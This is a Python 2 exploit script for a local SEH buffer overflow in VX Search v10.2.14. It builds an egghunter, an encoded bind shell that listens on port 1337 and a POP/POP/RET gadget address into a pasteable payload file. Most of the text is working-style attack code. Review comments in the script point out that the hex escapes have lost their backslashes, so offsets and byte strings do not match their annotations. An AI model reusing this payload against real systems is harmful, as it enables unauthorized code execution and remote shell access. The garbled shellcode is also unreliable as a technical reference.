#!/usr/bin/env python
#
# Exploit Title : VXSearch v10.2.14 Local SEH Overflow
# Date : 11/16/2017
# Exploit Author : wetw0rk
# Vendor Homepage : http://www.flexense.com/
# Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Version : 10.2.14
# Tested on : Windows 7 (x86)
# Description : VX Search v10.2.14 suffers from a local buffer overflow. The
# following exploit will generate a bind shell on port 1337. I
# was unable to get a shell working with msfvenom shellcode so
# below is a custom alphanumeric bind shell. Greetz rezkon ;)
#
# trigger the vulnerability by :
# Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
#

import struct

# Payload builder for the VX Search proxy-host-name SEH overflow described in
# the header. The script is Python 2 only: `print` is used as a statement
# (SyntaxError on Python 3) and `str` is a byte string, so the concatenated
# payload is written to pasteme.txt verbatim. The result is one 40000-character
# string that the header says is pasted by hand into the proxy host-name field.
#
# NOTE(review): the `\x..` escape sequences in the quoted byte strings appear
# to have lost their backslashes in transcription -- e.g. "x25x4ax4dx4ex55" is
# 15 printable characters, whereas the side comment (`and eax, 0x554e4d4a`)
# describes 5 bytes. As transcribed, the lengths and contents of these strings
# no longer match their annotations, so the offsets computed further down are
# off as well -- TODO confirm against the original listing.

# --- stage 2: shellcode ------------------------------------------------------
# "w00tw00t" is the egg tag; the egghunter below presumably scans memory for
# it (the hunter's bytes are encoded, so this is inferred from the name only).
shellcode = "w00tw00t"
# Alphanumeric stub: two ANDs clear EAX, three SUBs build a value in it, then
# PUSH EAX / POP ESP loads that value into ESP (sets the stack pointer).
shellcode += (
"x25x4ax4dx4ex55" # and eax, 0x554e4d4a
"x25x35x32x31x2a" # and eax, 0x2a313235
"x2dx6ax35x35x35" # sub eax, 0x3535356a
"x2dx65x6ax6ax65" # sub eax, 0x656a6a65
"x2dx61x64x4dx65" # sub eax, 0x654d6461
"x50" # push eax
"x5c" # pop esp
)
# Encoded body of the bind shell (port 1337 per the header). The byte pattern
# appears to repeat the same and/and/sub/sub/sub/push sequence as the stub
# (x25 x25 x2d x2d x2d x50), i.e. a sub-encoded alphanumeric payload.
shellcode += (
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx4fx4fx4fx4f"
"x2dx4fx30x4fx68x2dx62x2dx62x72x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx76x57x57x63x2dx77x36x39"
"x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x54"
"x54x54x2dx25x54x7ax2dx2dx25x52x76x36x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx49x35x49x49x2dx49"
"x25x49x69x2dx64x25x72x6cx50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx70x33x33x25x2dx70x25x70x25x2d"
"x4bx6ax56x39x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx79x55x75x32x2dx79x75x75x55x2dx79x77x77x78"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx25x4ax4a"
"x25x2dx39x5fx4dx34x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx4bx57x4bx57x2dx70x76x4bx79x2dx70x76"
"x78x79x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49"
"x49x49x49x2dx49x4ex64x49x2dx78x25x78x25x2dx6f"
"x25x7ax48x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x58x58x38x58x2dx58x30x32x58x2dx51x46x2dx47x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx5fx52x5fx5f"
"x2dx5fx25x25x35x2dx62x39x25x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx4ax4ax4ax4ax2dx4ax4ax4a"
"x4ax2dx79x39x4ax79x2dx6dx32x4bx68x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx30x30x71x30x2dx30x25"
"x71x30x2dx38x31x51x5fx50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx32x32x32x32x2dx78x77x7ax77x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx62x62x62x62x2d"
"x48x57x47x4fx50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx76x76x4fx4fx2dx36x39x5ax5ax50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx61x61x61x61x2dx4ax61x4a"
"x25x2dx45x77x53x35x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx63x63x63x63x2dx39x63x63x2dx2dx32x63"
"x7ax25x2dx31x49x7ax25x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx72x79x79x79x2dx25x30x25x30x2dx25"
"x32x25x55x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x58x58x41x58x2dx58x58x25x77x2dx6ex51x32x69x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx48x77x38x48"
"x2dx4ex76x6ex61x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx41x41x6ex6ex2dx31x31x30x6ex2dx37x36x30"
"x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx38x38"
"x38x38x2dx38x79x38x25x2dx38x79x38x25x2dx58x4c"
"x73x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx61"
"x52x61x52x2dx37x4ax31x49x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx4dx47x4dx4dx2dx30x25x4dx6bx2d"
"x36x32x66x71x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx36x43x43x6cx2dx33x54x47x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx4cx4cx4cx4cx2dx6ex4cx6e"
"x36x2dx65x67x6fx25x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx25x25x4bx4bx2dx25x25x6fx4bx2dx4ex41"
"x59x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41"
"x41x41x41x2dx52x52x78x41x2dx6ex6cx70x25x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx30x6cx30x30x2d"
"x30x6cx6cx30x2dx38x70x79x66x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx42x70x70x45x2dx32x45x70x31"
"x2dx25x4bx49x31x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx25x50x50x50x2dx25x7ax72x25x2dx4ex73x61"
"x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x77"
"x74x74x2dx61x78x35x34x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx30x30x30x30x2dx30x30x59x30x2dx30"
"x30x74x51x2dx6bx36x79x67x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx75x38x43x43x2dx7ax31x43x43x2d"
"x7ax2dx77x79x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx59x59x59x59x2dx59x59x59x59x2dx6fx6cx4dx77"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx45x45x45"
"x45x2dx34x2dx76x45x2dx37x25x5ax65x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx34x34x34x34x2dx62x34"
"x34x34x2dx6dx56x47x57x50x25x4ax4dx4ex55x25x35"
"x32x31x2ax2dx2dx2dx2dx2dx2dx76x2dx2dx76x2dx55"
"x4cx55x7ax50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x77x77x77x30x2dx47x47x79x30x2dx42x42x39x34x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx56x75x36x51"
"x2dx42x61x49x43x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx56x56x31x56x2dx31x79x31x25x2dx50x6cx48"
"x34x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx72x72"
"x72x72x2dx72x25x38x38x2dx38x25x25x25x2dx54x41"
"x30x30x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx47"
"x47x47x76x2dx47x47x76x76x2dx6bx72x6cx5ax50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx25x71x25x71x2d"
"x73x42x63x68x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx48x55x51x51x2dx45x78x4fx5ax50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx45x45x45x32x2dx45x45x25"
"x31x2dx76x75x2dx25x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx6ex4fx6dx6ex2dx35x48x5fx5fx50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx2dx2dx2dx2dx2dx71"
"x2dx2dx71x2dx71x2dx4ax71x2dx66x65x70x62x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx56x30x56x30x2d"
"x56x38x25x30x2dx74x37x25x45x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx32x32x32x77x2dx32x32x32x32"
"x2dx43x41x4ax57x50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx63x63x63x30x2dx79x41x41x6ex50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx4bx4bx4bx4bx2dx4bx4b"
"x25x31x2dx4bx71x25x32x2dx4fx6ex25x2dx50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx37x37x37x37x2dx6d"
"x37x6dx37x2dx6dx37x6dx37x2dx64x55x63x58x50x25"
"x4ax4dx4ex55x25x35x32x31x2ax2dx44x6cx6cx6cx2d"
"x34x44x44x6cx2dx30x33x4ex54x50x25x4ax4dx4ex55"
"x25x35x32x31x2ax2dx2dx7ax43x2dx2dx48x79x71x47"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41"
"x41x2dx41x46x71x25x2dx5ax77x7ax32x50x25x4ax4d"
"x4ex55x25x35x32x31x2ax2dx47x47x47x47x2dx47x6e"
"x47x6ex2dx47x78x6ex78x2dx47x79x77x79x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx74x38x69x38x2dx51"
"x4ax72x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x79x79x30x79x2dx4dx4dx2dx4dx2dx44x35x25x41x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx6fx6fx6fx31"
"x2dx74x25x6fx33x2dx56x32x41x25x50x25x4ax4dx4e"
"x55x25x35x32x31x2ax2dx54x54x54x54x2dx72x72x54"
"x54x2dx79x69x49x56x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx70x70x70x70x2dx70x25x5ax70x2dx4ax38"
"x36x72x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx6d"
"x6dx6dx6dx2dx6dx6dx6dx46x2dx48x76x74x25x2dx53"
"x7ax25x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x7ax7ax7ax43x2dx49x43x25x43x2dx25x5fx25x30x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx51x51x51x51"
"x2dx51x51x51x70x2dx38x51x61x7ax2dx25x39x70x7a"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx37x44x37"
"x6cx2dx78x30x6fx73x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx44x25x25x44x2dx76x25x76x76x2dx63x6c"
"x63x74x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx42"
"x47x74x4ex2dx33x6cx7ax39x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx7ax30x66x7ax2dx76x44x4fx49x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41x41"
"x2dx6dx67x33x6cx50x25x4ax4dx4ex55x25x35x32x31"
"x2ax2dx51x51x51x51x2dx65x71x51x51x2dx49x76x7a"
"x6ax50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x4a"
"x42x35x2dx35x7ax7ax42x2dx76x7ax73x7ax50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx35x25x35x35x2dx35"
"x25x76x35x2dx35x39x52x69x50x25x4ax4dx4ex55x25"
"x35x32x31x2ax2dx74x74x74x5ax2dx36x5ax74x30x2d"
"x25x32x6ax38x50x25x4ax4dx4ex55x25x35x32x31x2a"
"x2dx75x75x43x75x2dx43x6fx41x30x2dx39x64x30x34"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx74x2dx58"
"x6ex2dx78x47x35x69x50x25x4ax4dx4ex55x25x35x32"
"x31x2ax2dx66x79x4fx66x2dx48x7ax25x47x50x25x4a"
"x4dx4ex55x25x35x32x31x2ax2dx42x42x7ax42x2dx33"
"x6dx55x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2d"
"x61x61x61x41x2dx61x39x64x25x2dx59x33x7ax34x50"
"x25x4ax4dx4ex55x25x35x32x31x2ax2dx66x66x66x66"
"x2dx41x41x66x66x2dx25x33x66x66x2dx34x25x6dx43"
"x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49x49x32"
"x49x2dx49x59x25x49x2dx72x74x25x6dx50"
)
# 4000 bytes of filler appended to the shellcode stage; its purpose is not
# stated -- presumably slack for the decoder's output, TODO confirm.
shellcode += "A" * 4000

# --- stage 1: egghunter ------------------------------------------------------
egghunter = "A" * 40 # serve as NOP's
# Same ESP-setting stub as the shellcode stage, with different SUB constants.
egghunter += (
"x25x4ax4dx4ex55" # and eax, 0x554e4d4a
"x25x35x32x31x2a" # and eax, 0x2a313235
"x2dx58x58x58x58" # sub eax, 0x58585858
"x2dx58x58x67x58" # sub eax, 0x58675858
"x2dx5ax4fx2dx4f" # sub eax, 0x4f2d4f5a
"x50" # push eax
"x5c" # pop esp
)
# Encoded hunter body. Unlike the strings above this one is written as plain
# printable characters with no escapes, so it was not affected by the
# transcription issue noted at the top.
egghunter += (
"%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-"
"r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%"
"JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6"
"W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5"
"21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP"
)

# --- frame layout ------------------------------------------------------------
# Intended layout (per the side comments): `offset` + `shellcode` is exactly
# 23920 characters, so the nSEH field starts at index 23920, followed by the
# overwritten handler address, the egghunter, and filler up to 40000 total.
# If len(shellcode) ever exceeds 23920 the multiplier goes negative and Python
# yields an empty string, silently shifting the whole layout instead of
# failing loudly.
offset = "A" * (23920-len(shellcode)) # offset to nSEH
# Intended as a 4-byte short jump; as transcribed this is 12 printable
# characters (see the escape note at the top).
nSEH = "x74x26x75x26" # JE/JNZ + 38 (decimal)
# Little-endian 4-byte handler address; the comment identifies it as a
# POP/POP/RET gadget in QtGui4.dll. struct.pack makes this the one field that
# is guaranteed to be raw bytes regardless of the transcription issue.
SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint])
# Pad so the pasted string is exactly 40000 characters long.
trigger = "A" * (40000 - (
len(offset) +
len(nSEH) +
len(SEH) +
len(egghunter) +
len(shellcode)
)
)

# Final order: [offset][shellcode][nSEH][SEH][egghunter][trigger].
payload = offset + shellcode + nSEH + SEH + egghunter + trigger
print "[*] payload written to pasteme.txt"
# Python 2 text-mode write of the byte string; the handle is closed explicitly
# rather than via `with`, which is fine for a single-shot script.
fd = open("pasteme.txt", 'w')
fd.write(payload)
fd.close()